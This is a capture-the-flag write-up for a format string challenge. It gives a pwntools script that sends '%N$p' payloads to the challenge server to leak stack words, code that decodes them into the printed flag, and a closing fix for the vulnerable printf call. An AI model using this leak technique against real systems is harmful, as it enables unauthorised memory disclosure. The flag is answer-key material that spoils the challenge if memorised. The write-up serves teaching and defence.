leak me
I'm hiding something in my memory, can u figure out how to see it?
nc tcp.espark.tn 6050
Author: 4n7h4r4x
Files
main.c
Description: Format string vulnerability to leak flag from stack.
Solution: The flag is stored as a local variable on the stack. We can leak it using format string specifiers:
```python
from pwn import *

host = "tcp.espark.tn"
port = 6050

# Leak stack positions 6-10 which contain the flag
for i in range(6, 11):
    conn = remote(host, port)
    conn.recvuntil(b"format strings\n")
    payload = f"%{i}$p.".encode()
    conn.send(payload)
    response = conn.recvall(timeout=1).decode()
    print(f"Position {i}: {response}")
    conn.close()

# Hex values at positions 6-10:
hex_values = [
    0x30667b6b72617053,  # Spark{f0
    0x7274735f37346d72,  # rm47_str
    0x3372345f35676e31,  # 1ng5_4r3
    0x676e317a346d345f,  # _4m4z1ng
    0x7d,                # }
]

# Decode little-endian
flag = ""
for val in hex_values:
    bytes_val = []
    temp = val
    while temp > 0:
        bytes_val.append(chr(temp & 0xFF))
        temp >>= 8
    flag += ''.join(bytes_val)

print(flag)  # Spark{f0rm47_str1ng5_4r3_4m4z1ng}
```
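The decoding step above hardcodes the five leaked words; the following is an added example (not the author's script) that parses the raw `%N$p` responses directly, handles a NULL slot (`(nil)`) and the short final word, and pulls the flag out with a regex. The sample responses are constructed to match what the leak loop on this page prints.

```python
import re

# Constructed sample of the responses the leak loop prints for %6$p..%10$p
# (one per stack slot; glibc prints "(nil)" for a NULL %p argument).
SAMPLE_RESPONSES = [
    "0x30667b6b72617053.",
    "0x7274735f37346d72.",
    "0x3372345f35676e31.",
    "0x676e317a346d345f.",
    "0x7d.",
]

HEX_TOKEN = re.compile(r"0x[0-9a-fA-F]+|\(nil\)")


def qword_to_bytes(value, width=8):
    """Little-endian decode of one leaked 64-bit stack slot.

    Same result as the shift-and-mask loop in the writeup, but it also strips
    the NUL padding of a short final word such as 0x7d (which is just '}').
    Trailing NULs inside the flag itself would be lost too; a flag is ASCII,
    so that does not matter here."""
    return value.to_bytes(width, "little").rstrip(b"\x00")


def decode_leak(responses):
    """Concatenate the bytes sitting in each leaked stack slot, in order."""
    out = bytearray()
    for resp in responses:
        m = HEX_TOKEN.search(resp)
        if m is None or m.group(0) == "(nil)":
            continue  # no pointer-looking token, or a NULL slot: nothing to keep
        out += qword_to_bytes(int(m.group(0), 16))
    return bytes(out)


def extract_flag(leaked, prefix=b"Spark{"):
    """Return the flag string if the leaked bytes contain one, else None."""
    m = re.search(re.escape(prefix) + rb"[^}]*\}", leaked)
    return m.group(0).decode() if m else None


if __name__ == "__main__":
    leaked = decode_leak(SAMPLE_RESPONSES)
    print(leaked)
    print(extract_flag(leaked))
```

The root cause is user input passed as printf's format argument; passing it as data instead (`printf("%s", buf)`) and compiling with `-Wformat-security` removes this leak.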